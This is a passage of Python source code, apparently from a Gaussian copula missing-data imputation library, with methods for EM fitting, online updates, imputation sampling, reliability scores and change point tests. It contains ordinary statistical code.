The number of iterations to perform for estimating latent mean at ordinals.
Return
------
X_imp_num: array of shape (n_samples, n_features, num)
Imputed dataset.
'''
if X is None:
X = self.transform_function.X
if all(self._cont_indices):
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X)
Z_imp_num = self._sample_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num=num, num_ord_updates=num_ord_updates)
X_imp_num = np.zeros_like(Z_imp_num)
for i in range(num):
X_imp_num[...,i] = self._latent_to_imp(Z=Z_imp_num[...,i], X_to_impute=X)
else:
# slower
n, p = X.shape
X_imp_num = np.empty((n, p, num))
Z_cont = self.transform_function.get_cont_latent(X_to_transform=X)
for i in range(num):
# Z_ord_lower and Z_ord_upper will be different across i
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X, Z_cont=Z_cont, method='sampling')
# TODO: complete Z
Z_imp = self._sample_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num=1, num_ord_updates=num_ord_updates)
X_imp_num[...,i] = self._latent_to_imp(Z=Z_imp[...,0], X_to_impute=X)
return X_imp_num
def get_reliability(self, Ximp=None, alpha=0.95):
'''
Get the reliability of imputed entries. The notion of reliability is a relative quantity across all imputed entries.
Entries with higher reliability are more likely to have small imputation error.
Parameters
----------
Ximp: array-like of shape (n_samples, n_features) or None
Only used for all continuous variables.
The returned Gaussian copula imputed matrix.
alpha: float in (0,1), default = 0.95
The desired significance level.
Returns
-------
r: array-like of shape (n_samples, n_features)
Elementwise reliability
'''
if all(self._cont_indices):
r = self.get_reliability_cont(Ximp, alpha)
elif all(self._ord_indices):
r = self.get_reliability_ord()
else:
raise ValueError('Reliability computation is only available for either all continuous variables or all ordinal variables')
return r
def fit_change_point_test(self, X, X_true=None, n_train=0, nsamples=100, verbose=False):
'''
Conduct change point detection after receiving each data batch.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Input data
X_true: array-like of shape (n_samples, n_features) or None
If not None, it indicates that some (could be all) of the missing entries of X_batch are revealed,
and stored in X_true, after the imputation of X_batch. Those observation entries will be used to
update the model.
n_trian: int, default=0
The number of rows to be used to initialize the model estimation.
Use self._batch_size if n_train is 0
n_samples: int, default=100
The number of samples to draw for the resampling test
verbose: bool, default=True
If True, print progress information
Returns
-------
out: dict with keys
pval: dict with list
with keys as self._corr_diff_type,
and values as the corresponding empirical pvalues
statistics: dict with list
with keys as self._corr_diff_type
and values as the corresponding test statistics
'''
assert self._training_mode == 'minibatch-online'
if X_true is None:
X = self._preprocess_data(X)
else:
X = self._preprocess_data(X, set_indices=False)
self.set_indices(np.asarray(X_true))
cdf_types, inverse_cdf_types = self.get_cdf_estimation_type(p = X.shape[1])
self.transform_function = OnlineTransformFunction(self._cont_indices,
self._ord_indices,
window_size=self._window_size,
decay = self._decay,
cdf_types=cdf_types,
inverse_cdf_types=inverse_cdf_types
)
n,p = X.shape
self._corr = np.identity(p)
# initialize the model
n_train = self._batch_size if n_train == 0 else n_train
assert n_train > 0
ind_train = np.arange(n_train)
X_train = X[ind_train] if X_true is None else X_true[ind_train]
self.transform_function.update_window(X_train)
_ = self.partial_fit(X_batch = X_train, step_size=1)
pvals = defaultdict(list)
test_stats = defaultdict(list)
i=0
while True:
batch_lower = n_train + i*self._batch_size
batch_upper = min(n_train + (i+1)*self._batch_size, n)
if batch_lower>=n:
break
if verbose:
print(f'start batch {i+1}')
indices = np.arange(batch_lower, batch_upper, 1)
_X_true = None if X_true is None else X_true[indices]
_pval, _diff = self.change_point_test(X[indices,:], X_true=_X_true, step_size=self.stepsize(i+1), nsamples=nsamples)
for t in self._corr_diff_type:
pvals[t].append(_pval[t])
test_stats[t].append(_diff[t])
i+=1
out = {'pval':pvals, 'statistics':test_stats}
return out
####################################
#### General nonpublic functions
###################################
def get_imputed_confidence_interval_quantile(self, X=None, alpha = 0.95, num_ord_updates=1, num=200):
'''
Compute the confidence interval for each imputed entry.
Parameters
----------
X, alpha:
see Parameters in get_imputed_confidence_interval
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
num: int, default=200
Number of multiple samples to draw
Returns
-------
out:
see Returns in get_imputed_confidence_interval
'''
if X is None:
X = self.transform_function.X
X_imp_num = self.sample_imputation(X = X, num = num, num_ord_updates = num_ord_updates)
q_lower, q_upper = (1-alpha)/2, 1-(1-alpha)/2
lower, upper = np.quantile(X_imp_num, [q_lower, q_upper], axis=2)
obs_loc = ~np.isnan(X)
upper[obs_loc] = np.nan
lower[obs_loc] = np.nan
return {'upper':upper, 'lower':lower}
def get_reliability_cont(self, Ximp, alpha=0.95):
'''
Implements get_reliability when all variabels are continuous.
Parameters
----------
Ximp: array-like of shape (n_samples, n_features) or None
Only used for all continuous variables.
The returned Gaussian copula imputed matrix.
alpha: float in (0,1), default = 0.95
The desired significance level.
Returns
-------
reliability: array-like of shape (n_samples, n_features)
Elementwise reliability
'''
ct = self.get_imputed_confidence_interval(alpha = alpha)
d = ct['upper'] - ct['lower']
d_square, x_square = np.power(d,2), np.power(Ximp, 2)
missing_loc = np.isnan(self.transform_function.X)
# reliability has np.nan at observation locations because d has np.nan at those locations
reliability = (d_square[missing_loc].sum() - d_square) / (x_square[missing_loc].sum() - x_square)
return reliability
def get_reliability_ord(self):
'''
Implements get_reliability when all variabels are ordinal.
Returns
-------
reliability: array-like of shape (n_samples, n_features)
Elementwise reliability
'''
std_cond = self._get_cond_std_missing()
try:
Zimp = self._latent_Zimp
except AttributeError:
print(f'Cannot compute reliability before model fitting and imputation')
raise
Z_ord_lower, _ = self.transform_function.get_ord_latent()
reliability = np.zeros_like(Zimp) + np.nan
p = Zimp.shape[1]
for j in range(p):
# get cutsoff
col = Z_ord_lower[:,j]
missing_indices = np.isnan(col)
cuts = np.unique(col[~missing_indices])
cuts = cuts[np.isfinite(cuts)]
# compute reliability/the probability lower bound
for i,x in enumerate(missing_indices):
if x:
t = np.abs(Zimp[i,j] - cuts).min()
reliability[i,j] = 1 - np.power(std_cond[i,j]/t, 2)
return reliability
################################################
#### offline functions
################################################
def fit_transform_offline(self, X, **kwargs):
'''
Implement fit_transform when the training mode is 'standard' or 'minibatch-offline'
Parameters
----------
See Parameters of fit()
Returns
-------
See Returns of transform()
'''
self.fit_offline(X, **kwargs)
X_imp = self.transform()
return X_imp
def fit_offline(self, X, first_fit=True, max_iter=None, convergence_verbose=True, fit_cov=True):
'''
Implement fit when the training mode is 'standard' or 'minibatch-offline'
Parameters
----------
See Parameters of fit()
'''
X = self._preprocess_data(X)
# do marginal estimation
# for every fit, a brand new marginal transformation is used
if first_fit:
cdf_types, inverse_cdf_types = self.get_cdf_estimation_type(p = X.shape[1])
self.transform_function = TransformFunction(X,
cont_indices=self._cont_indices,
ord_indices=self._ord_indices,
cdf_types=cdf_types,
inverse_cdf_types=inverse_cdf_types
)
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent()
else:
Z_ord_lower, Z_ord_upper = self._Z_ord_lower, self._Z_ord_upper
Z = self._latent_Zimp.copy()
Z[np.isnan(X)] = np.nan
# estimate copula correlation matrix
if fit_cov:
Z_imp, C_ord = self._fit_covariance(Z, Z_ord_lower, Z_ord_upper,
first_fit=first_fit, max_iter=max_iter, convergence_verbose=convergence_verbose)
# attributes to store after model fitting
self._latent_Zimp = Z_imp
self._latent_Cord = C_ord
# attributes to store for additional training
self._Z_ord_lower = Z_ord_lower
self._Z_ord_upper = Z_ord_upper
################################################
#### online functions
################################################
def fit_transform_online(self, X, X_true=None, n_train=0):
'''
Implement fit_transform when the training mode is 'minibatch-online'
Parameters
----------
See Parameters of fit_transform()
Returns
-------
See Returns of transform()
'''
if X_true is not None:
X_true = np.array(X_true)
cdf_types, inverse_cdf_types = self.get_cdf_estimation_type(p = X.shape[1])
self.transform_function = OnlineTransformFunction(self._cont_indices,
self._ord_indices,
window_size=self._window_size,
decay = self._decay,
cdf_types=cdf_types,
inverse_cdf_types=inverse_cdf_types
)
n,p = X.shape
X_imp = np.zeros_like(X)
self._corr = np.identity(p)
# initialize the model
n_train = self._batch_size if n_train == 0 else n_train
assert n_train > 0
ind_train = np.arange(n_train)
X_train = X[ind_train] if X_true is None else X_true[ind_train]
self.transform_function.update_window(X_train)
_ = self.partial_fit(X_batch = X_train, step_size=1)
X_imp[ind_train] = self.transform(X = X_train, num_ord_updates=self._num_ord_updates)
i=0
while True:
batch_lower = n_train + i*self._batch_size
batch_upper = min(n_train + (i+1)*self._batch_size, n)
if batch_lower>=n:
break
indices = np.arange(batch_lower, batch_upper, 1)
_X_true = None if X_true is None else X_true[indices]
X_imp[indices] = self.partial_fit_transform(X[indices], step_size=self.stepsize(i+1), X_true=_X_true)
i+=1
if self._verbose > 0:
print(f'finish batch {i}')
return X_imp
def partial_fit_transform(self, X_batch, step_size=0.5, X_true=None):
"""
Updates the fit of the copula using the data in X_batch and returns the
imputed values and the new correlation for the copula
Parameters
----------
X_batch: array-like of shape (nbatch, nfeatures)
data matrix with entries to use to update copula and be imputed
step_size: float in (0,1), default=0.5
tunes how much to weight new covariance estimates
X_true:
If not None, it indicates that some (could be all) of the missing entries of X_batch are revealed,
and stored in X_true, after the imputation of X_batch. Those observation entries will be used to
update the model.
Returns
-------
X_imp: array-like of shape (nbatch, nfeatures)
X_batch with missing values imputed
"""
# impute missing entries in new data using previously fitted model
# just a step of out-of-sample imputation
X_for_update = X_batch if X_true is None else X_true
if self._realtime_marginal:
X_imp = X_batch.copy()
for i,x in enumerate(X_batch):
X_imp[i] = self.transform(X = x.reshape((1, -1)), num_ord_updates = self._num_ord_updates)
self.transform_function.update_window(X_for_update[i].reshape((1, -1)))
else:
X_imp = self.transform(X = X_batch, num_ord_updates=self._num_ord_updates)
self.transform_function.update_window(X_for_update)
# use new model to update model parameters
prev_corr = self._corr.copy()
new_corr = self.partial_fit(X_batch=X_for_update, step_size=step_size, model_update=True)
diff = self.get_matrix_diff(prev_corr, self._corr, self._corr_diff_type)
self._update_corr_diff(diff)
return X_imp
def partial_fit(self, X_batch, step_size=0.5, model_update=True):
'''
Update the copula correlation from new samples in X_batch, with given step size
Parameters
----------
X_batch: array-like of shape (nbatch, nfeatures)
data matrix with entries to use to update copula
step_size: float in (0,1), default=0.5
tunes how much to weight new covariance estimates
model_update: bool, default=True
If True, update fitting information
Returns
-------
new_corr: array-like of shape (nfeatures, nfeatures)
updated copula correlation
'''
Z_ord_lower, Z_ord_upper = self.transform_function.get_ord_latent(X_to_transform=X_batch)
Z_ord = self._init_Z_ord(Z_ord_lower, Z_ord_upper, method='univariate_mean')
Z_cont = self.transform_function.get_cont_latent(X_to_transform=X_batch)
Z = np.empty_like(X_batch)
Z[:, self._cont_indices] = Z_cont
Z[:, self._ord_indices] = Z_ord
corr, Z_imp, Z, C_ord, loglik = self._em_step(Z, Z_ord_lower, Z_ord_upper)
new_corr = corr*step_size + (1-step_size)*self._corr
if model_update:
self._corr = new_corr
self._latent_Zimp = Z_imp
self._latent_Cord = C_ord
self.likelihood.append(loglik)
return new_corr
def change_point_test(self, X, step_size, X_true=None, nsamples=100):
'''
Conduct change point test at the newly received data batch X
Parameters
----------
X: array-like of shape (nbatch, nfeatures)
The newly received (incomplete) data batch
X_true: array-like of shape (nbatch, nfeatures)
A matrix agrees with X at observed entries but has fewer missing entries.
step_size: flaot in (0,1)
The correlation update step size
nsamples: int, default = 100
The number of samples to draw for approximating the null distribution.
Returns
-------
pval: float
empirical p-value
diff: float
test statistics
'''
n,p = X.shape
missing_indices = np.isnan(X)
prev_corr = self._corr.copy()
changing_stat = defaultdict(list)
X_to_impute = np.zeros_like(X) * np.nan
for i in range(nsamples):
z = self._rng.multivariate_normal(np.zeros(p), prev_corr, n)
# mask
x = np.empty((n,p))
x[:,self.cont_indices] = self.transform_function.impute_cont_observed(z, X_to_impute)
x[:,self.ord_indices] = self.transform_function.impute_ord_observed(z, X_to_impute)
x[missing_indices] = np.nan
# TODO: compare with enabling marginal_update
new_corr = self.partial_fit(x, step_size=step_size, model_update=False)
diff = self.get_matrix_diff(prev_corr, new_corr, self._corr_diff_type)
self._update_corr_diff(diff, output=changing_stat)
self.transform_function.update_window(X)
new_corr = self.partial_fit(X, step_size=step_size, model_update=True)
diff = self.get_matrix_diff(prev_corr, new_corr, self._corr_diff_type)
self._update_corr_diff(diff)
# compute empirical p-values
changing_stat = pd.DataFrame(changing_stat)
pval = {}
for t in self._corr_diff_type:
pval[t] = (np.sum(diff[t]<changing_stat[t])+1)/(nsamples+1)
return pval, diff
################################################
#### core functions
################################################
def _latent_to_imp(self, Z, X_to_impute=None):
'''
Transform the complete latent matrix Z to the observed space, but only keep values at missing entries (to be imputed).
All values at observe entries will be replaced with original observation in X_to_impute.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
A complete matrix in latent Gaussian space
X_to_impute: array-like of shape (nsamples, nfeatures) or None
If None, self.transform_function.X will be used.
Returns
-------
X_imp: array-like of shape (nsamples, nfeatures)
The transformed complete matrix in the observed space
'''
# During the fitting process, all ordinal columns are moved to appear before all continuous columns
# Rearange the obtained results to go back to the original data ordering
if X_to_impute is None:
X_to_impute = self.transform_function.X
X_imp = X_to_impute.copy()
if any(self._cont_indices):
X_imp[:,self._cont_indices] = self.transform_function.impute_cont_observed(Z=Z, X_to_impute=X_to_impute)
if any(self._ord_indices):
X_imp[:,self._ord_indices] = self.transform_function.impute_ord_observed(Z=Z, X_to_impute=X_to_impute)
return X_imp
def _observed_to_latent(self, X_to_transform=None, Z_cont=None, method='univariate_mean'):
'''
Transform incomplete/complete data matrix X_to_transform to the latent Gaussian space.
Parameters
----------
X_to_transform: array-like of shape (nsamples, nfeatures) or None
If None, self.transform_function.X will be used.
Z_cont: array-like of shape (nsamples, nfeatures_cont)
The submatrix of the desired transformed latent matrix.
Used with cauction: it is designed to save repetitive computation of generating Z_cont
Returns
-------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
'''
if X_to_transform is None:
X_to_transform = self.transform_function.X
if Z_cont is None:
Z_cont = self.transform_function.get_cont_latent(X_to_transform=X_to_transform)
Z_ord_lower, Z_ord_upper = self.transform_function.get_ord_latent(X_to_transform=X_to_transform)
Z_ord = self._init_Z_ord(Z_ord_lower, Z_ord_upper, method=method)
# Z = np.concatenate((Z_ord, Z_cont), axis=1)
Z = np.empty_like(X_to_transform)
Z[:, self.cont_indices] = Z_cont
Z[:, self.ord_indices] = Z_ord
return Z, Z_ord_lower, Z_ord_upper
def _fit_covariance(self, Z, Z_ord_lower, Z_ord_upper, first_fit=True, max_iter=None, convergence_verbose=True):
"""
Fits the gaussian copula correlation matrix using only the transformed data in the latent space.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
first_fit: bool, default=True
if True, initialize the copula correlation matrix.
max_iter: int or None
The maximum number of iterations to run. If None, use self,_max_iter.
convergence_verbose: bool, default=True
If True, store self.n_iter_ as the number of iterations run
Returns
-------
Z_imp: array-like of shape (nsamples,nfeatures)
The completed matrix in the latent Gaussian space.
C_ord: array-like of shape (nfeatures, nfeatures)
The conditional covariance due to ordinal truncation.
"""
if first_fit:
self._init_copula_corr(Z)
n = len(Z)
# permutation of indices of data for stochastic fitting
if self._training_mode=='minibatch-offline':
training_permutation = self._rng.permutation(n)
# determine the maximal iteraitons to run
if self._training_mode=='minibatch-offline' and self._num_pass is not None:
max_iter = (np.ceil(n/self._batch_size) * self._num_pass).astype(np.int32)
if self._verbose>0:
print(f'The number of maximum iteration is set as {max_iter} to have {self._num_pass} passes over all data')
else:
max_iter = self._max_iter if max_iter is None else max_iter
converged = False
Z_imp = np.empty_like(Z)
for i in range(max_iter):
# track the change ratio of copula correlation as stopping criterion
prev_corr = self._corr
if np.isnan(prev_corr).any():
raise ValueError(f'Unexpected nan in updated copula correlation at iteration {i}')
# run EM iterations
if self._training_mode == 'standard':
# standard EM: each iteration uses all data points
corr, Z_imp, Z, C_ord, iterloglik = self._em_step(Z, Z_ord_lower, Z_ord_upper)
self._corr = corr
else:
# mini-batch EM: more frequent parameter update by using data input with smaller size at each iteration
batch_lower = (i * self._batch_size) % n
batch_upper = ((i+1) * self._batch_size) % n
if batch_upper < batch_lower:
# we have wrapped around the dataset
indices = np.concatenate((training_permutation[batch_lower:], training_permutation[:batch_upper]))
else:
indices = training_permutation[batch_lower:batch_upper]
corr, Z_imp_batch, Z_batch, C_ord, iterloglik = self._em_step(Z[indices], Z_ord_lower[indices], Z_ord_upper[indices])
Z_imp[indices] = Z_imp_batch
Z[indices] = Z_batch
step_size = self.stepsize(i+1)
self._corr = corr*step_size + (1 - step_size)*prev_corr
self._iter += 1
# stop if the change in the correlation estimation is below the threshold
corrudpate = self._get_scaled_diff(prev_corr, self._corr)
self.corrupdate.append(corrudpate)
if self._verbose>0:
print(f"Iter {self._iter}: copula parameter change {corrudpate:.4f}, likelihood {iterloglik:.4f}")
# append new likelihood
self.likelihood.append(iterloglik)
if corrudpate < self._threshold:
converged = True
if converged:
break
# store the number of iterations and print if converged
if convergence_verbose:
self._set_n_iter(converged, i)
return Z_imp, C_ord
def _em_step(self, Z, r_lower, r_upper):
"""
Executes one step of the EM algorithm to update the covariance
of the copula
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
Returns
-------
sigma: array-like of shape (nfeatures, nfeatures)
an estimate of the covariance of the copula
Z_imp: array-like of shape (nsamples,nfeatures)
The completed matrix in the latent Gaussian space.
C_ord: array-like of shape (nfeatures, nfeatures)
The conditional covariance due to ordinal truncation.
loglik: float
The computed log-likelihood
"""
n,p = Z.shape
assert n>0, 'EM step receives empty input'
max_workers = self._max_workers
num_ord_updates = self._num_ord_updates
out_dict = {}
out_dict['var_ordinal'] = np.zeros((n,p))
out_dict['Z_imp'] = Z.copy()
out_dict['Z'] = Z
out_dict['loglik'] = 0
out_dict['C'] = np.zeros((p,p))
has_truncation = self.has_truncation()
if max_workers ==1:
args = ('em', Z, r_lower, r_upper, self._corr, num_ord_updates, self._ord_indices, has_truncation)
res_dict = _latent_operation_body_(args)
for key in ['Z_imp', 'Z', 'var_ordinal']:
out_dict[key] = res_dict[key]
for key in ['loglik', 'C']:
out_dict[key] += res_dict[key]/n
else:
divide = n/max_workers * np.arange(max_workers+1)
divide = divide.astype(int)
args = [('em',
Z[divide[i]:divide[i+1]].copy(),
r_lower[divide[i]:divide[i+1]],
r_upper[divide[i]:divide[i+1]],
self._corr,
num_ord_updates,
self._ord_indices,
has_truncation
) for i in range(max_workers)]
with ProcessPoolExecutor(max_workers=max_workers) as pool:
res = pool.map(_latent_operation_body_, args)
for i, res_dict in enumerate(res):
for key in ['Z_imp', 'Z', 'var_ordinal']:
out_dict[key][divide[i]:divide[i+1]] = res_dict[key]
for key in ['loglik', 'C']:
out_dict[key] += res_dict[key]/n
Z_imp = out_dict['Z_imp']
C = out_dict['C']
C_ord = out_dict['var_ordinal']
try:
# the estimated covariance converges to 1
# if n is large enough, an alternative update rule as below is also plausible
# >>> sigma = np.cov(Z_imp, rowvar=False) + C
# >>> np.fill_diagonal(sigma, 1)
# however, when n is small, the above update rule is not robust: the updated sigma may fail to be positive definite
# Consequently, it easily fails in minibatch and online training mode
# The current updating rule is more robust
sigma = np.cov(Z_imp, rowvar=False) + C
if self._verbose>=3:
_diag = np.diag(sigma)
_max, _min = _diag.max(), _diag.min()
print(f'The estimated covariance values has min {_min:.3f} and max {_max:.3f}')
sigma = self._project_to_correlation(sigma)
except ZeroDivisionError:
print("unexpected zero covariance for the latent Z")
_min, _max = C.diagonal().min(), C.diagonal().max()
print(f'The diagonals of C ranges from min {_min} to max {_max}')
_m = np.cov(Z_imp, rowvar=False)
_min, _max = _m.diagonal().min(), _m.diagonal().max()
print(f'The diagonals of empirical covariance of Z_imp ranges from min {_min} to max {_max}')
idp = _m.diagonal() == _min
print(f'Min diagonal appears in {np.flatnonzero(idp)}-th variable with values:')
print(np.round(Z_imp[:,idp],4))
print(f'The fitted window is {self.transform_function.X[:,idp]}')
raise
loglik = out_dict['loglik']
return sigma, Z_imp, Z, C_ord, loglik
def _sample_latent(self, Z, Z_ord_lower, Z_ord_upper, num, num_ord_updates=2):
'''
Given incomplete Z, whice has missing entries due to missing observation,
sample those missing entries using the multivariate normal assumption in the latent space.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
Returns
-------
Z_imp_num: array-like of shape (nsamples, nfeatures, num)
The sampled latent values.
'''
n, p = Z.shape
max_workers = self._max_workers
seed = self._sample_seed
additional_args = {'num':num, 'seed':seed}
self._sample_seed += 1
has_truncation = self.has_truncation()
if max_workers ==1:
args = ('sample', Z, Z_ord_lower, Z_ord_upper, self._corr, num_ord_updates, self._ord_indices, has_truncation, additional_args)
res_dict = _latent_operation_body_(args)
Z_imp_num = res_dict['Z_imp_sample']
else:
divide = n/max_workers * np.arange(max_workers+1)
divide = divide.astype(int)
args = [('sample',
Z[divide[i]:divide[i+1]].copy(),
Z_ord_lower[divide[i]:divide[i+1]],
Z_ord_upper[divide[i]:divide[i+1]],
self._corr,
num_ord_updates,
self._ord_indices,
has_truncation,
additional_args
) for i in range(max_workers)]
Z_imp_num = np.empty((n,p,num))
with ProcessPoolExecutor(max_workers=max_workers) as pool:
res = pool.map(_latent_operation_body_, args)
for i, res_dict in enumerate(res):
Z_imp_num[divide[i]:divide[i+1],...] = res_dict['Z_imp_sample']
return Z_imp_num
def _fillup_latent(self, Z, Z_ord_lower, Z_ord_upper, num_ord_updates=2):
'''
Given incomplete Z, whice has missing entries due to missing observation,
fill up those missing entries using the multivariate normal assumption in the latent space.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
Z_ord_upper, Z_ord_lower: array-like of shape (nsamples, nfeatures_ord)
Upper and lower bound to sample from
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
Returns
-------
Z_imp: array-like of shape (nsamples, nfeatures)
The imputed latent values
C_ord: array-like of shape (nfeatures, nfeatures)
The conditional covariance due to ordinal truncation.
'''
n, p = Z.shape
max_workers = self._max_workers
has_truncation = self.has_truncation()
if max_workers ==1:
args = ('fillup', Z, Z_ord_lower, Z_ord_upper, self._corr, num_ord_updates, self._ord_indices, has_truncation)
res_dict = _latent_operation_body_(args)
Z_imp, C_ord = res_dict['Z_imp'], res_dict['var_ordinal']
else:
divide = n/max_workers * np.arange(max_workers+1)
divide = divide.astype(int)
args = [('fillup',
Z[divide[i]:divide[i+1]].copy(),
Z_ord_lower[divide[i]:divide[i+1]],
Z_ord_upper[divide[i]:divide[i+1]],
self._corr,
num_ord_updates,
self._ord_indices,
has_truncation
) for i in range(max_workers)]
Z_imp = np.empty((n,p))
C_ord = np.empty((n,p))
with ProcessPoolExecutor(max_workers=max_workers) as pool:
res = pool.map(_latent_operation_body_, args)
for i, res_dict in enumerate(res):
Z_imp[divide[i]:divide[i+1]] = res_dict['Z_imp']
C_ord[divide[i]:divide[i+1]] = res_dict['var_ordinal']
return Z_imp, C_ord
def _get_cond_std_missing(self, X=None, Cord=None):
'''
The conditional std of each missing location given other observation.
Parameters
----------
X: array-like of shape (nsamples,nfeatures) or None
Only its shape is used
Set to the data used for model fitting if None
Cord: array-like of shape (nfeatures, nfeatures) or None
The conditional covariance due to ordinal truncation.
Set to the returned values after model fitting if None
Returns
-------
std_cond: array-like of shape (nsamples,nfeatures)
Elementwise conditional std at each missing location. np.nan at observed locations.
'''
if Cord is None:
try:
Cord = self._latent_Cord
except AttributeError:
print(f'The model has not been fitted yet. Either fit the model first or supply Cord')
raise
if X is None:
X = self.transform_function.X
std_cond = np.zeros_like(X)
obs_loc = ~np.isnan(X)
std_cond[obs_loc] = np.nan
for i,x_row in enumerate(X):
missing_indices = np.isnan(x_row)
obs_indices = ~missing_indices
if any(missing_indices):
sigma_obs_obs = self._corr[np.ix_(obs_indices,obs_indices)]
sigma_obs_missing = self._corr[np.ix_(obs_indices, missing_indices)]
sigma_obs_obs_inv_obs_missing = np.linalg.solve(sigma_obs_obs, sigma_obs_missing)
# compute quantities
# _var = 1 - np.diagonal(np.matmul(sigma_obs_missing.T, sigma_obs_obs_inv_obs_missing))
# use einsum for faster and fewer computation
_var = 1 - np.einsum('ij, ji -> i', sigma_obs_missing.T, sigma_obs_obs_inv_obs_missing)
# When there exists valid ordinal observation, we will have self._latent_Cord[i, obs_indices].sum() positive.
if Cord[i, obs_indices].sum()>0:
_var += np.einsum('ij, j, ji -> i', sigma_obs_obs_inv_obs_missing.T, Cord[i, obs_indices], sigma_obs_obs_inv_obs_missing)
std_cond[i, missing_indices] = np.sqrt(_var)
return std_cond
def _init_Z_ord(self, Z_ord_lower, Z_ord_upper, method='univariate_mean'):
"""
Initializes the observed latent ordinal values by:
if method == 'sampling':
sampling from a standard Gaussian trucated to the inveral of Z_ord_lower, Z_ord_upper
if method == 'univariate_mean':
computing the mean of a standard Gaussian truncated to the inveral of Z_ord_lower, Z_ord_upper
Parameters
----------
Z_ord_lower : array-like of shape (nsamples, nfeatures_ordinal)
lower range for ordinals
Z_ord_upper : array-like of shape (nsamples, nfeatures_ordinal)
upper range for ordinals
Returns
-------
Z_ord : array-like of shape (nsamples, nfeatures_ordinal)
Samples drawn from gaussian truncated between Z_ord_lower and Z_ord_upper
"""
Z_ord = Z_ord_lower.copy()
if Z_ord_lower.shape[1] == 0:
return Z_ord
obs_indices = ~np.isnan(Z_ord_lower)
u_lower = norm.cdf(Z_ord_lower[obs_indices])
u_upper = norm.cdf(Z_ord_upper[obs_indices])
if (u_upper-u_lower).min()<=0:
loc = np.argmin(u_upper-u_lower)
print(f'Min of upper - lower: {u_upper[loc]-u_lower[loc]:.3f}')
print(f'where upper is {u_upper[loc]:.3f} and lower is {u_lower[loc]:.3f}')
raise ValueError('Invalid lower & upper bounds for ordinal')
if u_lower.min()<0:
print(f'Min of lower: {u_lower.min():.3f}')
raise ValueError('Invalid lower & upper bounds for ordinal')
if u_upper.max()>1:
print(f'Max of upper: {u_upper.max():.3f}')
raise ValueError('Invalid lower & upper bounds for ordinal')
if method == 'sampling':
_score = self._rng.uniform(u_lower, u_upper)
Z_ord[obs_indices] = norm.ppf(_score)
else:
alpha = Z_ord_lower[obs_indices]
beta = Z_ord_upper[obs_indices]
l = len(alpha)
out = get_truncnorm_moments_vec(alpha, beta, np.zeros(l), np.ones(l), mean_only=True)
Z_ord[obs_indices] = out['mean']
return Z_ord
def _init_copula_corr(self, Z):
'''
Initialize the copula correlaiont matrix using incomplete Z. First complete Z and then takes its sample correlaiton matrix.
Parameters
----------
Z: array-like of shape (nsamples, nfeatures)
Transformed latent matrix
'''
n,p = Z.shape
# mean impute the missing continuous values for the sake of covariance estimation
Z_imp = Z.copy()
Z_imp[np.isnan(Z_imp)] = 0.0
# initialize the correlation matrix
self._corr = np.corrcoef(Z_imp, rowvar=False)
if self._verbose > 1:
_svdvals = svdvals(self._corr)
print(f'singular values of the initialized correlation has min {_svdvals.min():.5f} and max {_svdvals.max():.5f}')
################################################
#### helper functions
################################################
def _project_to_correlation(self, covariance):
"""
Projects a covariance to a correlation matrix, normalizing it's diagonal entries. Only checks for diagonal entries to be positive.
Parameters
----------
covariance: array-like of shape (nfeatures, nfeatures)
Returns
-------
correlation: array-like of shape (nfeatures, nfeatures)
"""
D = np.diagonal(covariance)
if any(np.isclose(D, 0)):
raise ZeroDivisionError("unexpected zero covariance for the latent Z")
D_neg_half = 1.0/np.sqrt(D)
covariance *= D_neg_half
correlation = covariance.T * D_neg_half
return correlation
def _get_scaled_diff(self, prev_sigma, sigma):
"""
Get's the scaled difference between two correlation matrices
Parameters
----------
prev_sigma: array-like of shape (nfeatures, nfeatures)
previous estimate of a matrix
sigma: array-like of shape (nfeatures, nfeatures)
current estimate of a matrix
Returns
-------
diff: float
scaled distance between the inputs
"""
diff = np.linalg.norm(sigma - prev_sigma) / np.linalg.norm(sigma)
return diff
def _preprocess_data(self, X, set_indices = True):
'''
Store column names, set variable types and change X to be a numpy array
Parameters
----------
X: array-like of shape (nfeatures, nfeatures)
Input data
set_indices: bool, default=True
If true, set variaable types
Returns
-------
X: numpy array of shape (nfeatures, nfeatures)
Preprocessed input data
'''
if hasattr(X, 'columns'):
self.features_names = np.array(X.columns.to_list())
X = np.asarray(X)
if set_indices:
self.set_indices(X)
return X
def store_var_type(self, **indices):
'''
Store the integer based index for special variable types in self.var_type_dict.
'''
for name, values in indices.items():
if values is not None:
self.var_type_dict[name] = values
def has_truncation(self):
'''
Return if a truncated variable is present
'''
truncation = False
for name in ['lower_truncated', 'upper_truncated', 'twosided_truncated']:
if name in self.var_type_dict:
truncation = True
break
return truncation
def get_cdf_estimation_type(self, p):
'''
Return a list of str indicating the type of cdf estimation using self.var_type_dict
'''
cdf_types = np.array(['empirical'] * p, dtype = 'U20')
inverse_cdf_types = np.array(['empirical'] * p, dtype = 'U20')
for name, values in self.var_type_dict.items():
if name in ['lower_truncated', 'upper_truncated', 'twosided_truncated']:
cdf_types[values] = name
inverse_cdf_types[values] = name
return cdf_types, inverse_cdf_types
def set_indices(self, X):
'''
set variable types
'''
